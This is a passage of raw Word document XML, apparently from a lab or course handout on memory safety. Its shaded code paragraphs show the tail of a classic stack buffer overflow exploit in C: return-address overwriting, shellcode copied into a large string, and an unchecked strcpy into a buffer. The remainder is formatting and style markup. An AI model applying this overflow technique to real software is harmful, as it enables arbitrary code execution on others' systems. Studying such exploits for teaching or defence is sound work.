          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00373E4F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="001074E4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>for (i = 0; i &lt; 32; i++)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1FF6E8" w14:textId="77777777" w:rsidR="001074E4" w:rsidRPr="001074E4" w:rsidRDefault="001074E4" w:rsidP="001074E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001074E4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">    *(long_ptr + i) = (int) buffer;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4450063C" w14:textId="77777777" w:rsidR="001074E4" w:rsidRPr="001074E4" w:rsidRDefault="001074E4" w:rsidP="001074E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D0C11A0" w14:textId="083272D6" w:rsidR="001074E4" w:rsidRPr="001074E4" w:rsidRDefault="001074E4" w:rsidP="001074E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001074E4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00373E4F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="001074E4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>for (i = 0; i &lt; strlen(shellcode); i++)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630CFB31" w14:textId="77777777" w:rsidR="001074E4" w:rsidRPr="001074E4" w:rsidRDefault="001074E4" w:rsidP="001074E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001074E4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">    large_string[i] = shellcode[i];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040D7F5D" w14:textId="77777777" w:rsidR="001074E4" w:rsidRPr="001074E4" w:rsidRDefault="001074E4" w:rsidP="001074E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14DBD03B" w14:textId="5D84302F" w:rsidR="001074E4" w:rsidRPr="001074E4" w:rsidRDefault="001074E4" w:rsidP="001074E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001074E4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00373E4F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="001074E4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>printf("Testing");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD018D0" w14:textId="77777777" w:rsidR="001074E4" w:rsidRPr="001074E4" w:rsidRDefault="001074E4" w:rsidP="001074E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D54B1EF" w14:textId="3B920EA0" w:rsidR="001074E4" w:rsidRPr="001074E4" w:rsidRDefault="001074E4" w:rsidP="001074E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001074E4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00373E4F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="001074E4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>strcpy(buffer,large_string);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65376F0C" w14:textId="353B1DE1" w:rsidR="004305C0" w:rsidRPr="004305C0" w:rsidRDefault="001074E4" w:rsidP="001074E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001074E4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="004305C0" w:rsidRPr="004305C0" w:rsidSect="00E01030">
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:top="63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9581B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9214A32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0793148"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7470579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15:restartNumberingAfterBreak="0">
    <w:nsid w:val="167C5230"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B274BF7C"/>
    <w:lvl w:ilvl="0" w:tplc="8BD26AEA">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="0" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:sz w:val="28"/>
        <w:szCs w:val="28"/>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 w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="197836AC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="60E23B5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9BA2EBC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="62AA77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BA044DA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3356B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243F63"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DABE632A"/>
    <w:lvl w:ilvl="0" w:tplc="04090019">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 w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="3C6D731E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3B70B89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DFC31F5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6046BBE2"/>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40E541DA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2C74CC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344444B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E6C81686"/>
    <w:lvl w:ilvl="0" w:tplc="CBC0123C">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="0" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:b/>
        <w:bCs/>
        <w:sz w:val="28"/>
        <w:szCs w:val="28"/>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1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="464C1FE0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="094862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AEC7973"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0B5AC0E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15:restartNumberingAfterBreak="0">
    <w:nsid w:val="4B5B3445"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DDCA0AF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4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="4C2A3830"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="72E65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C812E74"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D18C96AA"/>
    <w:lvl w:ilvl="0" w:tplc="04090019">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 w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="4CEA62EF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="541050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E2D6A50"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="770EE2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F7050D9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C58E4B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1655E4B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A9EE9A12"/>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0" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="530D6CA1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="31A4D8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30E1960"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="73F020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0154DC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6ED66FA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3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5E832380"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="18C8F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D61200"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5AFE3D9E"/>
    <w:lvl w:ilvl="0" w:tplc="0409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5" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="63CB322C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1C58AF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E41BC3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9D60FB1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7" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="728B0724"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3A88C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ED5ADF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C644D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76980258">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1597789246">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="607737771">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="177618692">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1063256602">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1768501743">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="287787317">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="236138715">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="660154662">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1702511997">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1857308705">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1365055867">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1970623084">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1020282599">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="1979191031">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="1924678321">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="1633053706">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="376978217">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="1176270058">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="1609045348">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="2049910635">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="1031151966">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="91898668">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="1740127631">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="801728649">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="1313215743">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="1702248263">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="483204889">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="67372665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030"/>
    <w:rsid w:val="00011028"/>
    <w:rsid w:val="00017FEF"/>
    <w:rsid w:val="00047C51"/>
    <w:rsid w:val="00062ADD"/>
    <w:rsid w:val="00067479"/>
    <w:rsid w:val="00070749"/>
    <w:rsid w:val="000B2AD3"/>
    <w:rsid w:val="000C3E1F"/>
    <w:rsid w:val="000C73DF"/>
    <w:rsid w:val="000D4482"/>
    <w:rsid w:val="000E7B95"/>
    <w:rsid w:val="000F5EE3"/>
    <w:rsid w:val="001074E4"/>
    <w:rsid w:val="0012289B"/>
    <w:rsid w:val="001537E7"/>
    <w:rsid w:val="001A20ED"/>
    <w:rsid w:val="001B14D5"/>
    <w:rsid w:val="001B461D"/>
    <w:rsid w:val="001C0370"/>
    <w:rsid w:val="001C2446"/>
    <w:rsid w:val="001C44FA"/>
    <w:rsid w:val="001D53DA"/>
    <w:rsid w:val="00203369"/>
    <w:rsid w:val="002162D2"/>
    <w:rsid w:val="002274CB"/>
    <w:rsid w:val="00231DF9"/>
    <w:rsid w:val="00253E99"/>
    <w:rsid w:val="002B22AF"/>
    <w:rsid w:val="002B314F"/>
    <w:rsid w:val="002B6F97"/>
    <w:rsid w:val="002B70B2"/>
    <w:rsid w:val="002D44EC"/>
    <w:rsid w:val="002D519A"/>
    <w:rsid w:val="002F0025"/>
    <w:rsid w:val="003005BC"/>
    <w:rsid w:val="00333EB8"/>
    <w:rsid w:val="003607DF"/>
    <w:rsid w:val="00373E4F"/>
    <w:rsid w:val="00380E2C"/>
    <w:rsid w:val="003955CB"/>
    <w:rsid w:val="00397FDC"/>
    <w:rsid w:val="003A55F7"/>
    <w:rsid w:val="003F5311"/>
    <w:rsid w:val="003F66FE"/>
    <w:rsid w:val="00404BB1"/>
    <w:rsid w:val="004305C0"/>
    <w:rsid w:val="00445031"/>
    <w:rsid w:val="00455D42"/>
    <w:rsid w:val="00485876"/>
    <w:rsid w:val="004945DB"/>
    <w:rsid w:val="004B1020"/>
    <w:rsid w:val="004F313F"/>
    <w:rsid w:val="004F5949"/>
    <w:rsid w:val="00501737"/>
    <w:rsid w:val="00502293"/>
    <w:rsid w:val="005061E0"/>
    <w:rsid w:val="00512567"/>
    <w:rsid w:val="00516D00"/>
    <w:rsid w:val="00530D67"/>
    <w:rsid w:val="00576EA5"/>
    <w:rsid w:val="005972A8"/>
    <w:rsid w:val="005B202B"/>
    <w:rsid w:val="005C5A1E"/>
    <w:rsid w:val="005D2F85"/>
    <w:rsid w:val="005D5028"/>
    <w:rsid w:val="006115A9"/>
    <w:rsid w:val="00665C86"/>
    <w:rsid w:val="00687BBC"/>
    <w:rsid w:val="00690738"/>
    <w:rsid w:val="006A13D9"/>
    <w:rsid w:val="006C0FAA"/>
    <w:rsid w:val="00702942"/>
    <w:rsid w:val="007212E8"/>
    <w:rsid w:val="0073278A"/>
    <w:rsid w:val="00743E13"/>
    <w:rsid w:val="00761A61"/>
    <w:rsid w:val="00772F79"/>
    <w:rsid w:val="00785467"/>
    <w:rsid w:val="0078683D"/>
    <w:rsid w:val="00791A56"/>
    <w:rsid w:val="007A03A7"/>
    <w:rsid w:val="007B23DD"/>
    <w:rsid w:val="007E5981"/>
    <w:rsid w:val="00811968"/>
    <w:rsid w:val="00814845"/>
    <w:rsid w:val="0082177D"/>
    <w:rsid w:val="0083087D"/>
    <w:rsid w:val="00837379"/>
    <w:rsid w:val="008404DA"/>
    <w:rsid w:val="00845C3E"/>
    <w:rsid w:val="00850308"/>
    <w:rsid w:val="00893C96"/>
    <w:rsid w:val="008A2A55"/>
    <w:rsid w:val="008E01BA"/>
    <w:rsid w:val="009162B8"/>
    <w:rsid w:val="00917A8E"/>
    <w:rsid w:val="00940C58"/>
    <w:rsid w:val="009620AF"/>
    <w:rsid w:val="009A01B9"/>
    <w:rsid w:val="009A1C25"/>
    <w:rsid w:val="009C44FD"/>
    <w:rsid w:val="009E6B1B"/>
    <w:rsid w:val="009F1421"/>
    <w:rsid w:val="00A12940"/>
    <w:rsid w:val="00A51019"/>
    <w:rsid w:val="00A547EC"/>
    <w:rsid w:val="00A60D37"/>
    <w:rsid w:val="00A710D0"/>
    <w:rsid w:val="00A756DD"/>
    <w:rsid w:val="00AE2422"/>
    <w:rsid w:val="00AE3D19"/>
    <w:rsid w:val="00AE421B"/>
    <w:rsid w:val="00AF59B6"/>
    <w:rsid w:val="00B13EA4"/>
    <w:rsid w:val="00B32AF4"/>
    <w:rsid w:val="00B362B8"/>
    <w:rsid w:val="00B83252"/>
    <w:rsid w:val="00B90614"/>
    <w:rsid w:val="00B945E8"/>
    <w:rsid w:val="00BB5C3D"/>
    <w:rsid w:val="00BC5903"/>
    <w:rsid w:val="00C139C5"/>
    <w:rsid w:val="00C172E2"/>
    <w:rsid w:val="00C20F73"/>
    <w:rsid w:val="00C21427"/>
    <w:rsid w:val="00C34385"/>
    <w:rsid w:val="00C43773"/>
    <w:rsid w:val="00C60E21"/>
    <w:rsid w:val="00C8311D"/>
    <w:rsid w:val="00C8702C"/>
    <w:rsid w:val="00CA27E4"/>
    <w:rsid w:val="00CA2921"/>
    <w:rsid w:val="00CD4B1B"/>
    <w:rsid w:val="00CE68C0"/>
    <w:rsid w:val="00CF15B8"/>
    <w:rsid w:val="00D22D12"/>
    <w:rsid w:val="00D80A4F"/>
    <w:rsid w:val="00D97D36"/>
    <w:rsid w:val="00DB603A"/>
    <w:rsid w:val="00DF1EEF"/>
    <w:rsid w:val="00E01030"/>
    <w:rsid w:val="00E036C5"/>
    <w:rsid w:val="00E31CCE"/>
    <w:rsid w:val="00E52AD2"/>
    <w:rsid w:val="00E54EC8"/>
    <w:rsid w:val="00EA48F8"/>
    <w:rsid w:val="00EA7DA3"/>
    <w:rsid w:val="00EB0770"/>
    <w:rsid w:val="00EB19E8"/>
    <w:rsid w:val="00EE0B78"/>
    <w:rsid w:val="00F06C31"/>
    <w:rsid w:val="00F3604D"/>
    <w:rsid w:val="00F660FC"/>
    <w:rsid w:val="00FD4934"/>
    <w:rsid w:val="00FD4EDD"/>
    <w:rsid w:val="00FE2CCF"/>
    <w:rsid w:val="00FF61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98A56"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{3596C6CD-D2AD-4FB9-8D8D-D4A8AB422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03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1030"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00CA27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32AF4"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="002B314F"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="002B31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6205">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="36201610">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="244459697">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="403839934">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="524639368">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="578827250">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="581842073">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="740564814">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
